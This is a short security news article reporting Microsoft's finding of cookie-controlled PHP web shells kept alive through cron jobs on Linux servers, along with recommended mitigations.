Microsoft's Defender Security Research Team has identified a new technique where threat actors deploy PHP-based web shells on Linux servers that use HTTP cookies as a control mechanism. Instead of traditional methods using URL parameters or request bodies, these web shells rely on threat actor-supplied cookie values to gate execution, making them harder to detect through conventional monitoring.

The severity and scope of these attacks remain under investigation, as Microsoft has not disclosed specific CVSS scores or the number of affected systems. The use of cookie-controlled execution represents a significant evolution in web shell techniques, as it allows attackers to blend malicious commands with legitimate web traffic more effectively.

The technical mechanism involves embedding malicious PHP code that reads specific cookie values to determine whether to execute commands. This approach helps the web shells evade security tools that typically monitor URL parameters and POST data for suspicious activity. The shells can persist on compromised systems through cron jobs, ensuring continued access even after system reboots.

Mitigation strategies include implementing comprehensive web application firewalls that inspect cookie data, regularly auditing web server files for unauthorized PHP scripts, and monitoring cron job schedules for suspicious entries. Organizations should also ensure their web applications validate and sanitize all input, including cookie data.

The discovery highlights the evolving sophistication of web shell deployment techniques as attackers adapt to improved security monitoring capabilities.